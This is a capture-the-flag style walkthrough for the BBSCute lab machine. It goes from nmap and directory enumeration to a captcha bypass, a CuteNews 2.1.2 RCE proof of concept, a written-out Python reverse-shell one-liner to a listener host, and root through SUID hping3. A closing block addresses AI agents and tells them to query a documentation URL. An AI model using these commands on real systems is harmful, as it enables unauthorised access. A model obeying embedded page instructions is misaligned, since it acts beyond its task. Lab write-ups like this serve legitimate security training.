# BBSCute

## Nmap

```
sudo nmap   192.168.120.128 -p- -sS -sV                                      

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
88/tcp  open  http     nginx 1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Navigating to port 80 in the browser lands us on the default install page for Apache.

![](/files/-MXIIlLvIdbdFnu0ALNW)

Running `dirsearch.py` against the target web servers reveals index.php

```
python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url
```

![](/files/-MXIIxl749yPPlTmwoIp)

Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

![](/files/-MXIJ5rhWdIedAjzIdB5)

Instead we can register ourselves as a new user to access. On the register new user page we are not able to load the captcha which stops us from proceeding:

![/index.php?register](/files/-MXIJYgE2p5GBgr5o3S6)

Reviewing the source of this page shows we do have a link for captcha.php.

![](/files/-MXIJolSZs8iGsxPxxb4)

Viewing this will show what the current captcha should be.

![/captcha.php](/files/-MXIK67Gr7zNcqvRazYA)

Entering this into the registration field will allow us to proceed with new user creation.

![](/files/-MXIKHigSN64BSr2VUvg)

We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with `searchsploit` shows the results below.

![](/files/-MXINbV42dq4tBEbiF8A)

Searching further on Google for exploits we come across a PoC on GitHub located here: <https://github.com/CRFSlick/CVE-2019-11447-POC>.

Download the python script and the `sad.gif` files to the same directory. Run with the syntax shown below.

```
python3 <User> <Pass> http://192.168.120.128/index.php
```

![](/files/-MXIpGzstxFADzC0GBUA)

We can now run the following command to get a more usable reverse shell on a different listener:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.120",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

![](/files/-MXIqw09jqzzcswUJhcc)

From here I uploaded `linpeas` which after executing identified the binary hping3 as having a SUID bit set. Meaning we can execute the binary with root permissions.

![](/files/-MXIvhN7sei7cHxuEll5)

Then as per [GTFOBins](https://gtfobins.github.io/gtfobins/hping3/) we can executed with the SUID bit to gain a root shell.

![](/files/-MXIvtXz8NTmF2wb-0It)

```
/usr/sbin/hping3
/bin/sh -p

OR

./hping3
/bin/sh -p
```

![](/files/-MXIw8aNK7Wo98lbgtoC)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/bbscute.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.